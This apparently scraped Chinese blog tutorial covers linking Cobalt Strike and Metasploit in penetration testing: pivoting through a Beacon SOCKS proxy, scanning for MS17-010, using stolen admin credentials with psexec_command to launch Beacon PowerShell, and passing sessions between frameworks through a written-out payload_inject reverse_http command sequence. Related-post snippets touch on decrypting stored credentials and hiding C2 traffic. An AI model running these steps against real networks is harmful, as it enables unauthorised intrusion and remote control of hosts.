<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CobalStrike 與 Metasploit實戰聯動

    VSole2022-03-19 06:54:46

    前言

    CobalStrike 與 Metasploit 均是滲透利器,各有所長。前者更適合做穩控平臺,后者則更擅長內網各類探測搜集與漏洞利用。

    兩者更需要靈活的聯動,各自相互依托,從而提升滲透的效率。

    內置Socks功能

    通過Beacon內置的socks功能在VPS上開啟代理端口,打通目標內網通道,之后將本地Metasploit直接帶入目標內網,進行橫向滲透。

    當然,也可以把代理設置在其他的工具上,不限于Proxychains、Proxifier等。

    首先,到已控目標機的Beacon下將socks代理開啟。

    1
    beacon > socks 1024 #端口根據VPS實際情況進行設置
    

    點開菜單欄中的View > Proxy Pivots,復制代理連接到Metasploit中。

    本地啟動Metasploit,掛上代理,就可以對目標內網進行各種探測搜集。


    如 探測目標內網中存在MS17_010漏洞的主機,這也是內網拿主機權限利用方式之一。


    利用MSF模塊上線Beacon shell

    當通過其它方式拿到了目標內網中某臺Windows機器的本地管理員明文密碼或hash時,可利用Metasploit下auxiliary/admin/smb/psexec_command模塊,直接上線指定目標機器的Beacon shell。(前提目標機可出網)


    先利用CobalStrike生成上線Beacon的powershell。

    本地啟動Metasploit,掛上代理,設置psexec_command模塊參數。



    最終,只要密碼一致、 能出網,且未被殺軟阻止的均會成功上線。

    CS與MSF會話互傳

    CobaltStrike派生Metasploit

    當CobaltStrike獲得了一個上線機器,想把這個目標傳給Metasploit中的meterpreter,獲得一個session進行控制。

    在Metasploit執行以下命令:

    之后使用CobaltStrike創建一個windows/foreign/reverse_tcp的Listener。

    其中IP為Metasploit的監聽地址,端口為Metasploit所監聽的端口。


    然后選中計算機,右鍵->Spawn:選擇MSF的監聽器:


    這個時候可以看到,Metasploit上的監聽已經上線,現在可以對meterpreter獲得的session進行控制。

    Metasploit派生CobaltStrike

    現在已經獲得了一個meterpreter的session,把session傳給CobaltStrike。

    在CobaltStrike中創建一個監聽者,和上一步類似,這里host需要修改為CobaltStrike客戶端IP,創建好之后便監聽8099端口,等待著被控機連接。

    接下來,把meterpreter獲得的session轉交給CobaltStrike,在Metasploit執行以下命令:


    1
    meterpreter > background
    2
    msf5 > use exploit/windows/local/payload_inject
    3
    msf5 > set payload windows/meterpreter/reverse_http
    4
    msf5 > set lhost 192.168.144.174
    5
    msf5 > set lport 8099
    6
    msf5 > set DisablePayloadHandler true
    7
    msf5 > set session 1
    8
    msf5 > run
    

    解釋一下這些參數。

    由于CobaltStrike的監聽器我們使用的是:

    windows/beacon_http/reverse_http
    

    所以我們的payload也要使用:

    payload windows/meterpreter/reverse_http
    

    設置本地監聽IP和端口:由于監聽器是CobaltStrike的,所以要設置成CobaltStrike機器的IP與端口。

    默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于我們已經有了一個,所以不需要在產生一個,這里我們設置:

    set DisablePayloadHandler true
    

    設置當前的session,執行run。

    此時目標機便已成功從CobaltStrike上線。


    總結

    關于CobalStrike與Metasploit 的聯動利用方式遠不止這些,每種方式在實戰中都有對應的應用場景,更需要探索與總結。

    在測試過程中詳細的信息收集意味著不同的滲透測試路線,也只有信息的關聯使用和復用才能更加有效的放大滲透成果。

    metasploitsession
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    最后的功能是支持 7.3.3 版本之前和之后的兩種解密算法,并且支持 Passphrase 解密(前提是你要知道用戶設置的 Passphrase),這次主要學習了一個河豚解密算法的編寫。舊版本的加解密算法正是使用了河豚算法,這個算法比較容易恢復明文密碼,所以新版本添加了 Passphrase 的 SHA256 數據摘要作為 AES-256-CBC 算法的 Key,增加了解密難度,和 Xshell 的主密碼一樣。
    本文為內測第一周結束后內網學員的學習筆記,后續本公眾號會持續更新其他課程學員學習筆記。對課程感興趣,請添加文末小助手微信咨詢。0x01 MSF安裝和升級 最近mac本機和linux服務器上的msf在執行msfupdate命令以后都出現了不同程度的玄學問題,于是卸了重裝。
    前言 CobalStrike 與 Metasploit 均是滲透利器,各有所長。前者更適合做穩控平臺,后者則更擅長內網各類探測搜集與漏洞利用。 兩者更需要靈活的聯動,各自相互依托,從而提升滲透的效率。 內置Socks功能 通過Beacon內置的socks功能在VPS上開啟代理端口,打通目標內網通道,之后將本地Metasploit直接帶入目標內網,進行橫向滲透。 當然,也可以把代理設置在其他的
    可以通過Meterpreter的客戶端執行攻擊腳本,遠程調用目標主機上運行的Meterpreter服務端。
    CobaltStrike與MSF聯動
    2021-11-18 07:52:49
    CobalStrike更適合做個穩控平臺,輕型的遠控工具,內置Windows系統類模塊較多,Metasploit更擅長各類內網搜集和漏洞利用,包含多類型操作系統模塊,但是使用起來“比較笨重”。
    無論對于是平時出于各種目的游走在網頁和服務器中的黑客,還是從事網絡安全測試的安全人員來說,一個好的漏洞框架發揮的作用不言而喻。
    本文詳細介紹在metasploit-framework中云函數的使用方法及相關技巧,希望通過本文能夠對紅隊同學在紅藍對抗過程中有所幫助。或者設置對應告警,一旦紅隊人員使用云函數上線,防守方馬上就能定位到哪臺機器已經失陷,然后修復漏洞。session 1是使用云函數上線時的效果,只能獲取到云函數的網關IP。
    CS 域前置+流量混淆
    2021-10-14 06:58:22
    域前置(Domain Fronting)被稱為域前端網絡攻擊技術,是一種隱藏連接真實端點來規避互聯網審查的技術。這種技術被安全人員多用來隱藏 Metasploit,Cobalt Strike 等團隊控制服務器流量, 以此來一定程度繞過檢查器或防火墻檢測的技術,國內外如:Amazon ,Google,Akamai 等大型廠商都會提供一些域前端技術服務。
    VulnHub 靶機滲透之 DC-1
    2021-03-11 14:30:45
    2,可以直接在網上查詢Drupal的漏洞利用。3,使用metasploit對漏洞進行利用msfconsole啟動metasploit,搜索drupal模塊。4,excellent級別最新的drupalgeddon2這個exploit嘗試攻擊。6,找到flag1,提示查看Drupal的配置文件,這個配置文件必須要關注,一般可以從內容中得到數據庫用戶名及密碼。11,找到了一個users表,猜測應該是和登錄賬號有關。13,這里利用exploitdb中有一個Drupal7的攻擊腳本,可以增加一個admin權限的賬號。
    msf提權簡單利用
    2023-06-06 09:03:11
    免責聲明請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,作者不為此承擔任何責任。將創建的用戶添加到遠程連接組net localgroup Administrators username /add 將創建的用戶添加到管理員組然后即可通過遠程登錄進入本機進行遠程連接至此實驗成功!
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类